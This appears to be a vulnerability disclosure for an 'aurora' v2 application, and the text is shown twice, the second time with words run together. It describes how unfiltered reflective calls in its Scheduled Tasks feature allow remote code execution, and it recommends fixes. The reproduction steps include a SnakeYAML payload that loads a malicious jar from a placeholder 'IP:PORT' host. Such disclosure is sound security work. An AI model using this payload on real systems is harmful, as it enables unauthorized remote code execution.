1. Steps to reproduce
Using the project https://github.com/artsploit/yaml-payload, modify AwesomeScriptEngineFactory.java as follows
Building and package, moveyaml-payload.jar into the root directory of the web service
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
When using the Scheduled Tasks feature, the call string will always contain symbols such as brackets and quotes, however, the XSSFilter in the program will convert these symbols to other characters, making the Scheduled Tasks feature completely unusable. So we need to whitelist the XSSFilter in application.yml for routes related to the scheduled tasks
A new scheduled task is created as follows
调用目标字符串 field is org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://IP:PORT/yaml-payload.jar"]]]]')
Execute this task after submission to remotely execute arbitrarily code
2. Expected behavior
The com.aurora.util.JobInvokeUtil#invokeMethod method is used to reflectively execute the specified method of the given class
3. Actual behavior
However, there is no filtering of incoming class names and method names in this method, resulting in dangerous class names and method names being passed in and executed
4. Affected Version
v2
5. Fixes Recommendations
- Filter dangerous class names
- Filter unnecessary protocols such as http, rmi, etc.
1. Steps to reproduce
Using the project
https://github.com/artsploit/yaml-payload, modifyAwesomeScriptEngineFactory.javaas followsBuilding and package, move
yaml-payload.jarinto the root directory of the web servicejavac src/artsploit/AwesomeScriptEngineFactory.java jar -cvf yaml-payload.jar -C src/ .When using the Scheduled Tasks feature, the call string will always contain symbols such as brackets and quotes, however, the XSSFilter in the program will convert these symbols to other characters, making the Scheduled Tasks feature completely unusable. So we need to whitelist the XSSFilter in
application.ymlfor routes related to the scheduled tasksA new scheduled task is created as follows
调用目标字符串field isorg.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://IP:PORT/yaml-payload.jar"]]]]')Execute this task after submission to remotely execute arbitrarily code
2. Expected behavior
The
com.aurora.util.JobInvokeUtil#invokeMethodmethod is used to reflectively execute the specified method of the given class3. Actual behavior
However, there is no filtering of incoming class names and method names in this method, resulting in dangerous class names and method names being passed in and executed
4. Affected Version
v2
5. Fixes Recommendations